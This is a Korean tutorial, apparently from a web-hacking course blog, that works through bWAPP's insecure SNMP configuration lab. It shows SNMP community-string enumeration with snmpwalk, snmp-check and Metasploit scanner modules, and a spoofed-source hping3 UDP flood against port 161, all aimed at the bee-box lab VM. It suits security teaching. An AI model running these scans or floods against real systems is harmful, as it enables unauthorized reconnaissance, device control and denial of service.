웹 해킹 bWAPP - 72. A5 - Security Misconfiguration - Insecure SNMP Configuration
본 내용은 교육 과정에서 필요한 실습 목적으로 구성된 것이며, 혹시라도 개인적인 용도 및 악의적인 목적으로 사용할 경우, 법적 책임은 본인에게 있다는 것을 알려드립니다.
1. Security Misconfiguration
- OWASP Top10 A5 - 잘못된 보안 구성
- 서버/시스템/DB/네트워크 장비/웹 설정 요류로 인하여 발생하는 취약점이다.
- Ex) 디렉토리 리스팅, 에러페이지, 웹페이지 주석, 웹서버 기본 설정, Adobe Flash 취약점, DoS/DDos 공격,
특정 서비스에 대한 Reverse_TCP 공격, 로컬 권한 취약점, 백업/임시/robots 파일
2. Insecure SNMP Configuration
- SNMP는 매니저와 에이전트 간에 사전 공유키 개념인 커뮤니티 값이 기본값이거나 평문으로 전송되는 문제점이 있다.
- 이를 통해서 공격자가 커뮤니티 값을 획득하여 시스템/장비들에 대한 정보 확인 및 명령을 수행하는 취약점이 있다.
- 또한, SNMP 메세지를 통해서 Dos/DDos 공격이 가능한 취약점이 있다.
3. Security Misconfiguration - Insecure SNMP Configuration
- 이 시나리오는 SNMP 커뮤니티 및 SNMP 메세지를 이용한 시스템 정보를 획득하는 내용이다.
Ex1) Security Misconfiguration - Insecure SNMP Configuration 이해 I
보안 레벨 선택 및 시나리오 선택
Hint : 연결/실행된 HTTP 프로세스를 열거하여라...?
bWAPP에 SNMP 설치 실시
|
bee@bee-box:/var/www/bWAPP$ sudo apt-get install snmp
[sudo] password for bee: bug
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following NEW packages will be installed:
snmp
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 158kB of archives.
After this operation, 582kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
snmp
Install these packages without verification [y/N]? y
Get:1 http://old-releases.ubuntu.com hardy/main snmp 5.4.1~dfsg-4ubuntu4 [158kB]
Fetched 158kB in 1s (96.4kB/s)
Selecting previously deselected package snmp.
(Reading database ... 105451 files and directories currently installed.)
Unpacking snmp (from .../snmp_5.4.1~dfsg-4ubuntu4_i386.deb) ...
Setting up snmp (5.4.1~dfsg-4ubuntu4) ... |
bWAPP snmp 정보 확인 실시
|
bee@bee-box:~$ snmpwalk -Os -c public -v 1 localhost system
sysDescr.0 = STRING: Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
sysObjectID.0 = OID: netSnmpAgentOIDs.10
sysUpTimeInstance = Timeticks: (2826951) 7:51:09.51
sysContact.0 = STRING: Your master bee
sysName.0 = STRING: bee-box
sysLocation.0 = STRING: Every bee needs a home!
sysORLastChange.0 = Timeticks: (16) 0:00:00.16
sysORID.1 = OID: snmpFrameworkMIBCompliance
sysORID.2 = OID: snmpMPDCompliance
sysORID.3 = OID: usmMIBCompliance
sysORID.4 = OID: snmpMIB
sysORID.5 = OID: tcpMIB
sysORID.6 = OID: ip
sysORID.7 = OID: udpMIB
sysORID.8 = OID: vacmBasicGroup
sysORDescr.1 = STRING: The SNMP Management Architecture MIB.
sysORDescr.2 = STRING: The MIB for Message Processing and Dispatching.
sysORDescr.3 = STRING: The management information definitions for the SNMP User-based Security Model.
sysORDescr.4 = STRING: The MIB module for SNMPv2 entities
sysORDescr.5 = STRING: The MIB module for managing TCP implementations
sysORDescr.6 = STRING: The MIB module for managing IP and ICMP implementations
sysORDescr.7 = STRING: The MIB module for managing UDP implementations
sysORDescr.8 = STRING: View-based Access Control Model for SNMP.
sysORUpTime.1 = Timeticks: (16) 0:00:00.16
sysORUpTime.2 = Timeticks: (16) 0:00:00.16
sysORUpTime.3 = Timeticks: (16) 0:00:00.16
sysORUpTime.4 = Timeticks: (16) 0:00:00.16
sysORUpTime.5 = Timeticks: (16) 0:00:00.16
sysORUpTime.6 = Timeticks: (16) 0:00:00.16
sysORUpTime.7 = Timeticks: (16) 0:00:00.16
sysORUpTime.8 = Timeticks: (16) 0:00:00.16
bee@bee-box:~$ |
와이어샤크 실행 및 eth1 캡처 실시
SNMP 커뮤니티 획득 실시
커뮤니티 'private' 확인
커뮤니티 'public' 확인
snmp-check를 이용하여 bWAPP 상세 정보 확인
|
root@kali:~# snmp-check 192.168.20.205 -c public -p 161 | more
snmp-check v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)
[+] Try to connect to 192.168.20.205:161 using SNMPv1 and community 'public'
[*] System information:
Host IP address : 192.168.20.205
Hostname : bee-box
Description : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr
10 13:23:42 UTC 2008 i686
Contact : Your master bee
Location : Every bee needs a home!
Uptime snmp : 08:06:35.25
Uptime system : 08:05:31.02
System date : 2019-2-19 11:13:50.0
[*] Network information:
IP forwarding enabled : no
Default TTL : 64
TCP segments received : 2910511
TCP segments sent : 265053
--More--
~ 중간 생략 ~
|
snmp-check를 이용하여 bWAPP Apaceh2 상세 정보 확인
|
root@kali:~# snmp-check 192.168.20.205 -c public -p 161 > bWAPP.snmp
root@kali:~# cat bWAPP.snmp | head -101 | tail -3 ; cat bWAPP.snmp | grep apache2
[*] Processes:
Id Status Name Path Parameters
6892 runnable apache2 /usr/sbin/apache2 -k start
6895 runnable apache2 /usr/sbin/apache2 -k start
6898 runnable apache2 /usr/sbin/fcgi-pm -k start
7018 runnable apache2 /usr/sbin/apache2 -k start
7019 runnable apache2 /usr/sbin/apache2 -k start
7020 runnable apache2 /usr/sbin/apache2 -k start
7021 runnable apache2 /usr/sbin/apache2 -k start
7022 runnable apache2 /usr/sbin/apache2 -k start
9904 runnable apache2 /usr/sbin/apache2 -k start
9937 runnable apache2 /usr/sbin/apache2 -k start
9938 runnable apache2 /usr/sbin/apache2 -k start
9939 runnable apache2 /usr/sbin/apache2 -k start
root@kali:~# |
Ex2) Security Misconfiguration - Insecure SNMP Configuration 이해 II
SNMP 커뮤니티 획득 실시
|
root@kali:~# msfconsole -q
msf > use auxiliary/scanner/snmp/snmp_login
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_login) > exploit
[!] No active DB -- Credential data will not be saved!
[+] 192.168.20.205:161 - Login Successful: private (Access level: read-write); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[+] 192.168.20.205:161 - Login Successful: public (Access level: read-only); Proof (sysDescr.0): Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) >
msf auxiliary(scanner/snmp/snmp_login) > use auxiliary/scanner/snmp/snmp_enum
msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enum) > exploit
[+] 192.168.20.205, Connected.
[*] System information:
Host IP : 192.168.20.205
Hostname : bee-box
Description : Linux bee-box 2.6.24-16-generic #1 SMP Thu Apr 10 13:23:42 UTC 2008 i686
Contact : Your master bee
Location : Every bee needs a home!
Uptime snmp : 09:28:39.48
Uptime system : 09:27:35.24
System date : 2019-2-19 12:35:54.0
~ 중간 생략 ~
msf auxiliary(scanner/snmp/snmp_enum) >
msf auxiliary(scanner/snmp/snmp_enum) > use auxiliary/scanner/snmp/snmp_enumusers
msf auxiliary(scanner/snmp/snmp_enumusers) > set rhosts 192.168.20.205
rhosts => 192.168.20.205
msf auxiliary(scanner/snmp/snmp_enumusers) > exploit
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/snmp/snmp_enumusers) >quit
root@kali:~# |
Ex3) Security Misconfiguration - Insecure SNMP Configuration 이해 III
bee@bee-box:~$ gnome-system-monitor &
[1] 4342
bWAPP에서 시스템 모니터링 도구 실행 실시
UDP 플러딩 공격 실시
|
root@kali:~# hping3 --udp 192.168.20.205 -p 161 -a 1.2.3.4 --flood
HPING 192.168.20.205 (eth1 192.168.20.205): udp mode set, 28 headers + 0 data bytes
hping in flood mode, no replies will be shown
(Ctrl+C)
--- 192.168.20.205 hping statistic ---
1588649 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#
|
BWAPP 부하 발생 확인
[유튜브] 동영상 강의 링크 (구독! 좋아요!!!)
웹해킹 72. A5 - bWAPP Security Misconfiguration - Insecure SNMP Configuration https://youtu.be/33Q4QvDoAU4
